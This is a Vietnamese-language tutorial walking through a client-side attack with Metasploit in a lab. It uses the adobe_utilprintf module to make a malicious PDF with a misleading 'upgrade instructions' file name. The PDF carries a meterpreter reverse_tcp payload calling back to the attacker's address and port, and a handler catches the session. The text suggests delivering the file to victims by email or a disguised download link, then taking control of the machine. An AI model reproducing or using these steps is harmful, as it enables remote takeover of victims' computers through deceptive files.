Trong bài này chúng ta thực hiện kiểu tấn công gọi là: Client Side Exploits tức là tấn công dựa vào sự tương tác của người dùng (nhấp chuột, mở tập tin, thực thi tập tin…).

Kịch bản tấn công như sau: Máy Linux attacker sẽ tạo ra một tập tin PDF chứa mã độc sao cho khi nạn nhân(WinXP SP3) mở tập tin PDF đó ra thì sẽ mở một kết nối (session control) đến máy người tấn công(linux attacker), lúc này máy nạn nhân bị chiếm quyền điều khiển bởi máy tấn công (attacker)

Bước 1: Chạy chương trình Metasploit

./msfconsole

Bước 2: Tạo tập tin PDF chứa mã độc

Giải thích:

  • use exploit/windows/fileformat/adobe_utilprintf : sử dụng module adobe_utils để tạo ra tập tin pdf có chứa mã độc
  • set FILENAME BestComputers-UpgradeInstructions.pdf: thiết lập giá trị FILENAME của module này là tập tin BestComputers-UpgradeInstructions.pdf
  • set PAYLOAD windows/meterpreter/reverse_tcp: thiết lập giá trị PAYLOAD là một kết nối TCP ngược về địa chỉ được ấn định(LHOST, LPORT)
  • set LHOST 192.168.8.128 : thiết lập địa chỉ lắng nghe kết nối từ phía nạn nhân chính là địa chỉ IP của máy linux attacker
  • set LPORT 4455 : thiết lập cổng lắng nghe(port) kết nối từ phía nạn nhân chính là địa chỉ IP của máy linux attacker
  • show options : kiểm tra các giá trị của module này, chú ý phần Exploit Target cho chúng ta biết được môi trường có thể khai thác lỗ hỏng được.

Sau đó gõ lệnh sau để tạo tập tin PDF (BestComputers-UpgradeInstructions.pdf)

Vậy là chúng ta đã tạo xong tập tin PDF có chứa mã độc, chúng ta sẽ tạo một bộ lắng nghe chờ kết nối về từ nạn nhân. Chúng ta sẽ sử dụng module exploit/multi/handler của Metasploit như sau:

Bước 3: Thực hiện gửi tập tin pdf cho nạn nhân

Chúng ta sẽ gửi tập tin PDF (BestComputers-UpgradeInstructions.pdf) cho máy nạn nhân, thực tế là thông qua mail hay hình thức trá hình nào đó(nhấp vào link tải về), để cho dễ chúng ta thực hiện copy sang máy nạn nhân(WinXP SP3 có cài Adode v8.1), trên máy nạn nhân mở tập tin PDF lên

Bước 4: Chiếm quyền kiểm soát máy nạn nhân

Khi nạn nhân mở tập tin PDf lên thì lúc này một kết nối tcp mở ra từ phía nạn nhân sẽ về máy tấn công (ip cấu hình lúc tạo PDF)

Lúc này cửa sổ chuyển thành chế độ meterpreter báo có kết nối từ phía nạn nhân và lúc này chúng ta sẽ thực thi một số hàm meterpreter cở bản như sau:

Link demohttps://youtu.be/l399pek9TD8